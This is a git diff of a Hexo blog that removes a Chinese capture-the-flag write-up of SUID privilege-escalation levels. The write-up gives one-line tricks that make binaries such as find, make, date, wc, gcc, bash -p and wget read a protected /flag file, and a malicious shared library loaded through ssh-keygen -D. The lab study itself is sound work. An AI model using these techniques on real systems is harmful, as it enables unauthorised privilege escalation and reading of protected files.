-
-<h3 id="23"><a href="#23" class="headerlink" title="23"></a>23</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">genisoimage -<span class="built_in">sort</span> /flag</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="24"><a href="#24" class="headerlink" title="24"></a>24</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">env</span> <span class="built_in">cat</span> /flag</span><br></pre></td></tr></table></figure></div>
-
-
-<h3 id="25"><a href="#25" class="headerlink" title="25"></a>25</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">find . -<span class="built_in">exec</span> <span class="built_in">cat</span> /flag \; -quit</span><br></pre></td></tr></table></figure></div>
-<p>这里后面不加<code>quit</code>会一直<code>find</code></p>
-<h3 id="26"><a href="#26" class="headerlink" title="26"></a>26</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">vim Makefile</span><br><span class="line">    run:</span><br><span class="line">        <span class="built_in">cat</span> /flag</span><br><span class="line"></span><br><span class="line">make run</span><br></pre></td></tr></table></figure></div>
-<p>or</p>
-<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">COMMAND=<span class="string">&#x27;cat /flag&#x27;</span>;make -s --<span class="built_in">eval</span>=$<span class="string">&#x27;x:\n\t-&#x27;</span><span class="string">&quot;<span class="variable">$COMMAND</span>&quot;</span></span><br></pre></td></tr></table></figure></div>
-<p><code>-s</code>选项告诉<code>make</code>以静默模式运行，也就是不输出详细的构建信息，只显示关键信息。<br><code>--eval=$&#39;x:\n\t-&#39;&quot;$COMMAND&quot;</code>:<code>--eval</code>用于在执行<code>make</code>时求值指定的表达式；<code>$&#39;x:\n\t-&#39;&quot;COMMAND&quot;</code>是一个将表达式传递给<code>make</code>的字符串<br><code>-x</code>是一个<code>Makefile</code>规则，它指定了一个名为<code>x</code>的目标。在这个例子中，<code>x</code>是目标的名字，后面的冒号表示这是一个伪目标。<br><code>\n\t-</code>是一个转义字符序列，表示一个换行符和一个制表符。这是<code>Makefile</code>语法中规定的，用于表示命令行的缩进。<br><code>&quot;$COMMAND&quot;</code>会被展开为前面定义的<code>COMMAND</code>变量的值 ，也就是<code>cat /flag</code>。这将作为<code>x</code>目标的执行命令。</p>
-<h3 id="27"><a href="#27" class="headerlink" title="27"></a>27</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">nice</span> <span class="built_in">cat</span> /flag</span><br></pre></td></tr></table></figure></div>
-
-
-<h3 id="28"><a href="#28" class="headerlink" title="28"></a>28</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">timeout</span> 7d <span class="built_in">cat</span> /flag</span><br><span class="line"></span><br></pre></td></tr></table></figure></div>
-
-
-<h3 id="29"><a href="#29" class="headerlink" title="29"></a>29</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">stdbuf</span> -i0 <span class="built_in">cat</span> /flag</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="30"><a href="#30" class="headerlink" title="30"></a>30</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">setarch $(<span class="built_in">arch</span>) <span class="built_in">cat</span> /flag</span><br></pre></td></tr></table></figure></div>
-
-
-<h3 id="31"><a href="#31" class="headerlink" title="31"></a>31</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">watch -x <span class="built_in">cat</span> /flag</span><br></pre></td></tr></table></figure></div>
-
-
-<h3 id="32"><a href="#32" class="headerlink" title="32"></a>32</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">socat -u FILE:/flag STDOUT</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="33"><a href="#33" class="headerlink" title="33"></a>33</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">whiptail --textbox --scrolltext /flag 20 80</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="34"><a href="#34" class="headerlink" title="34"></a>34</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">awk <span class="string">&#x27;&#123;print&#125;&#x27;</span> /flag</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="35"><a href="#35" class="headerlink" title="35"></a>35</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">sed -n <span class="string">&#x27;p&#x27;</span> /flag</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="36"><a href="#36" class="headerlink" title="36"></a>36</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">ed /flag</span><br><span class="line">,p</span><br></pre></td></tr></table></figure></div>
-<p>or</p>
-<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">echo</span> n | ed /flag</span><br></pre></td></tr></table></figure></div>
-<p>打开名为 <code>/flag</code> 的文件，并向 <code>ed</code> 命令传递了字符 <code>n</code>。在 <code>ed</code> 编辑器中，<code>n</code> 通常用于打印当前行的内容。</p>
-<h3 id="37"><a href="#37" class="headerlink" title="37"></a>37</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">chown</span> -c hacker /flag</span><br><span class="line"><span class="built_in">cat</span> /flag</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="38"><a href="#38" class="headerlink" title="38"></a>38</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">chmod</span> 777 /flag &amp;&amp; <span class="built_in">cat</span> /flag</span><br></pre></td></tr></table></figure></div>
-
-<h3 id="39"><a href="#39" class="headerlink" title="39"></a>39</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">cp</span> /flag /dev/stdout</span><br></pre></td></tr></table></figure></div>
-<p>震惊!原来还可以这样输出!</p>
-<h3 id="40"><a href="#40" class="headerlink" title="40"></a>40</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">mv</span> /usr/bin/cat /usr/bin/mv</span><br><span class="line"></span><br><span class="line"><span class="built_in">mv</span> /flag</span><br></pre></td></tr></table></figure></div>
-
-
-<h3 id="41"><a href="#41" class="headerlink" title="41"></a>41</h3><p>perl脚本</p>
-<div class="highlight-container" data-rel="Perl"><figure class="iseeu highlight perl"><table><tr><td class="code"><pre><span class="line"><span class="keyword">my</span> $flags=<span class="string">&quot;/flag&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">open</span>(<span class="keyword">my</span> $flag,<span class="string">&#x27;&lt;&#x27;</span>,$flags) <span class="keyword">or</span> <span class="keyword">die</span> <span class="string">&quot;Could not open file: $!&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span>(<span class="keyword">my</span> $line = &lt;$flag&gt;)&#123;</span><br><span class="line">        <span class="keyword">print</span> $line;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">close</span> ($flag);</span><br></pre></td></tr></table></figure></div>
-<p>perl脚本和bash脚本的区别:<br>        Perl（Practical Extraction and Reporting Language）和Bash（Bourne-Again Shell）是两种不同的编程语言，它们有一些显著的区别：<br>        1. <strong>用途</strong>:<br>            - <strong>Perl</strong> 是一种通用的编程语言，专注于文本处理、数据转换、报告生成、正则表达式和系统管理等任务。Perl通常用于处理复杂的文本操作和数据处理任务。<br>            - <strong>Bash</strong> 是一种Unix Shell脚本语言，用于操作和自动化命令行环境中的任务。Bash通常用于执行系统命令、管理文件系统、编写简单的脚本以及处理系统级任务。<br>        2. <strong>语法</strong>:<br>            - <strong>Perl</strong> 具有一种更灵活和强大的语法，支持面向对象编程、函数式编程、正则表达式和高级数据结构。它有强大的字符串处理能力和大量的内置模块。<br>            - <strong>Bash</strong> 的语法相对较简单，主要用于执行命令和控制流操作。它适用于简单的脚本编写和自动化任务。<br>        3. <strong>数据类型</strong>:<br>            - <strong>Perl</strong> 具有更多的内置数据类型，包括标量（scalar）、数组（array）、哈希（hash）以及对象。它对数据处理和数据结构操作更为灵活。<br>            - <strong>Bash</strong> 主要处理文本和字符串，虽然可以处理数组，但对于更复杂的数据结构支持较弱。<br>        4. <strong>模块和库</strong>:<br>            - <strong>Perl</strong> 拥有丰富的模块和库，涵盖了各种领域，可以加速开发。CPAN（Comprehensive Perl Archive Network）是Perl社区的模块存储库，包含了大量的开源模块。<br>            - <strong>Bash</strong> 虽然有一些内置的函数和工具，但它的生态系统相对较小，通常需要依赖于外部工具和命令行实用程序来执行复杂的任务。<br>        5. <strong>适用场景</strong>:<br>            - <strong>Perl</strong> 更适合于需要复杂文本处理、正则表达式、数据转换、网络编程、脚本测试和大型应用程序开发等任务。<br>            - <strong>Bash</strong> 更适合于系统管理、自动化任务、批处理处理、简单脚本编写以及与命令行工具的交互。<br>        总之，Perl和Bash是两种不同的编程语言，各自在不同的领域和用途中具有优势。选择使用哪种语言取决于您要解决的具体问题和任务的性质。有时，它们也可以结合使用，以充分利用各自的优势。</p>
-<h3 id="42"><a href="#42" class="headerlink" title="42"></a>42</h3><div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;/flag&quot;</span>,<span class="string">&quot;r&quot;</span>) <span class="keyword">as</span> file:</span><br><span class="line">    content = file.read()</span><br><span class="line">    <span class="built_in">print</span>(content)</span><br></pre></td></tr></table></figure></div>
-
-
-<h3 id="43"><a href="#43" class="headerlink" title="43"></a>43</h3><div class="highlight-container" data-rel="Ruby"><figure class="iseeu highlight ruby"><table><tr><td class="code"><pre><span class="line">flag = <span class="string">&quot;/flag&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">begin</span></span><br><span class="line">  file = <span class="title class_">File</span>.open(flag,<span class="string">&quot;r&quot;</span>)</span><br><span class="line">  content = file.read</span><br><span class="line">  puts content</span><br><span class="line"><span class="keyword">rescue</span> <span class="title class_">Errno</span><span class="symbol">:</span><span class="symbol">:ENOENT</span></span><br><span class="line">  puts <span class="string">&quot;File &#x27;<span class="subst">#&#123;flag&#125;</span>&#x27; not fount.&quot;</span></span><br><span class="line"><span class="keyword">rescue</span> <span class="title class_">StandardError</span> =&gt; e</span><br><span class="line">  puts <span class="string">&quot;An error occurred: <span class="subst">#&#123;e&#125;</span>&quot;</span></span><br><span class="line"><span class="keyword">ensure</span></span><br><span class="line">  file.close <span class="keyword">if</span> file</span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure></div>
-
-
-<h3 id="44"><a href="#44" class="headerlink" title="44"></a>44</h3><p>本题最开始是和上面一样尝试写一个bash脚本，然后使用bash命令去执行，但发现依然没有权限访问flag。</p>
-<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="meta">#!/usr/bin/bash</span></span><br><span class="line">filename=<span class="string">&quot;/flag&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> [ ! -f <span class="string">&quot;<span class="variable">$filename</span>&quot;</span> ]; <span class="keyword">then</span></span><br><span class="line">  <span class="built_in">echo</span> <span class="string">&quot;File &#x27;<span class="variable">$filename</span>&#x27; not found.&quot;</span></span><br><span class="line">  <span class="built_in">exit</span> 1</span><br><span class="line"><span class="keyword">fi</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> IFS= <span class="built_in">read</span> -r line; <span class="keyword">do</span></span><br><span class="line">  <span class="built_in">echo</span> <span class="string">&quot;<span class="variable">$line</span>&quot;</span></span><br><span class="line"><span class="keyword">done</span> &lt; <span class="string">&quot;<span class="variable">$filename</span>&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">exit</span> 0</span><br></pre></td></tr></table></figure></div>
-
-<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="meta">#!/usr/bin/bash</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> /flag</span><br><span class="line"></span><br><span class="line"><span class="built_in">exit</span> 0</span><br></pre></td></tr></table></figure></div>
-<p>以上两个均会报错权限不允许<br>后经查阅发现是需要使用<code>bash -p</code> 进行提权，它的意思是以安全模式启动<code>bash</code>，因为在这里<code>bash</code>设置了<code>SUID</code> ，所以在这里是执行了之后相当于在当前命令行下执行的命令都具有bash命令的权限，然后直接使用<code>cat /flag</code> 就好了</p>
-<h3 id="45"><a href="#45" class="headerlink" title="45"></a>45</h3><p>在经过查阅<code>date</code>命令并进行尝试后试出答案，理论上是使用<code>date</code>命令直接报错输出<code>/flag</code>里面的内容</p>
-<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">date</span> -f /flag</span><br><span class="line"></span><br></pre></td></tr></table></figure></div>
-
-<h3 id="46"><a href="#46" class="headerlink" title="46"></a>46</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">demsg -F /flag</span><br></pre></td></tr></table></figure></div>
-
-
-<h3 id="47"><a href="#47" class="headerlink" title="47"></a>47</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">wc</span> -l --files0-from=/flag</span><br></pre></td></tr></table></figure></div>
-
-
-<h3 id="48"><a href="#48" class="headerlink" title="48"></a>48</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">gcc -E -x c /flag</span><br></pre></td></tr></table></figure></div>
-<p>本题最初是想写一个c文件编译读取，但写完后发现不行，和<code>bash</code>那个一样<a href="###44">44</a>，经查阅后发现需要这样读取<code>/flag</code></p>
-<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> result = system(<span class="string">&quot;cat /flag&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (result == <span class="number">-1</span>) &#123;</span><br><span class="line">        perror(<span class="string">&quot;Error executing cat command&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>
-
-
-<p>这条命令告诉<code>gcc</code>命令执行预处理操作，以处理<code>/flag</code>文件中的C语言代码，<code>-E</code> 表示执行预处理操作而不进行编译，<code>-x c</code>用于指定输入文件的类型，表示输入文件是C语言代码。</p>
-<h3 id="49"><a href="#49" class="headerlink" title="49"></a>49</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">as -a /flag</span><br></pre></td></tr></table></figure></div>
-
-
-<h3 id="50"><a href="#50" class="headerlink" title="50"></a>50</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">nc -lp 8088 &amp; wget --post-file=/flag http://127.0.0.1:8088</span><br></pre></td></tr></table></figure></div>
-
-<p>查看wget命令后使用了-i参数读取，读取出来了但是都是小写，没有通过，后经查阅发现需要这样使用</p>
-<h3 id="51"><a href="#51" class="headerlink" title="51"></a>51</h3><p><a class="link"   href="https://www.youtube.com/watch?v=14mIjpOXnrM&t=2878s" >related resource <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a><br><a class="link"   href="https://www.bilibili.com/video/BV1ok4y1m75p/" >b站提取video <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
-<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="type">static</span> <span class="type">void</span> <span class="title function_">inject</span><span class="params">()</span> __<span class="title function_">attribute__</span><span class="params">((constructor))</span>;</span><br><span class="line"><span class="type">void</span> <span class="title function_">C_GetFunctionList</span><span class="params">()</span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;euid:%d\n&quot;</span>,geteuid());</span><br><span class="line">    sendfile(<span class="number">1</span>,open(<span class="string">&quot;/flag&quot;</span>,<span class="number">0</span>),<span class="number">0</span>,<span class="number">4096</span>);</span><br><span class="line">    <span class="comment">//system(&quot;cp /bin/bash /tmp/bash &amp;&amp; chmod +s /tmp/bash &amp;&amp; /tmp/bash -p&quot;);</span></span><br><span class="line">    <span class="type">char</span> *argvv[]=&#123;<span class="string">&quot;bash&quot;</span>,<span class="string">&quot;-p&quot;</span>,<span class="literal">NULL</span>&#125;;</span><br><span class="line">    execvp(<span class="string">&quot;/bin/bash&quot;</span>,argvv);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>
-
-<p>best answer</p>
-<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">C_GetFunctionList</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    sendfile(<span class="number">1</span>,open(<span class="string">&quot;/flag&quot;</span>,<span class="number">0</span>),<span class="number">0</span>,<span class="number">4096</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>
-
-
-<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">gcc level51.c -shared -o su.os</span><br><span class="line">ssh-keygen -D ./su.os</span><br></pre></td></tr></table></figure></div>
-
-<p>首先翻阅man page可以看到ssh-keygen用-D参数可以直接运行任意的共享库，如果有suid的话就能运行我们的恶意代码造成提权</p>
-<p>c程序中可以利用&lt;dlfcn.h&gt;头文件中的一系列函数dlopen，dlclose来加载运行共享库。</p>
-<p>gcc可以通过<code>-shared</code>参数来创建共享库，共享库不能单独运行，它相当于一个必须被别人调用才能运行的程序，它与普通二进制程序的区别可以通过file命令来查看，共享库没有<code>interpreter</code>这样的字段，也就是没有链接解释器。%</p>
 ]]></content>
       <tags>
         <tag>pwn</tag>
diff --git a/tags/index.html b/tags/index.html
index b581ed7..237cb97 100644
--- a/tags/index.html
+++ b/tags/index.html
@@ -28,7 +28,7 @@
 <meta property="og:site_name" content="Hexo">
 <meta property="og:locale" content="en_US">
 <meta property="article:published_time" content="2024-07-18T06:14:57.000Z">
-<meta property="article:modified_time" content="2024-07-18T06:20:37.362Z">
+<meta property="article:modified_time" content="2024-07-18T06:20:37.000Z">
 <meta property="article:author" content="John Doe">
 <meta name="twitter:card" content="summary">
     
@@ -617,7 +617,7 @@ <h1 class="tagcloud-header">Tags</h1>
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>
diff --git a/tags/pwn/index.html b/tags/pwn/index.html
index 4ddaed8..2e2fb63 100644
--- a/tags/pwn/index.html
+++ b/tags/pwn/index.html
@@ -647,7 +647,7 @@ <h2 class="ml13">
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>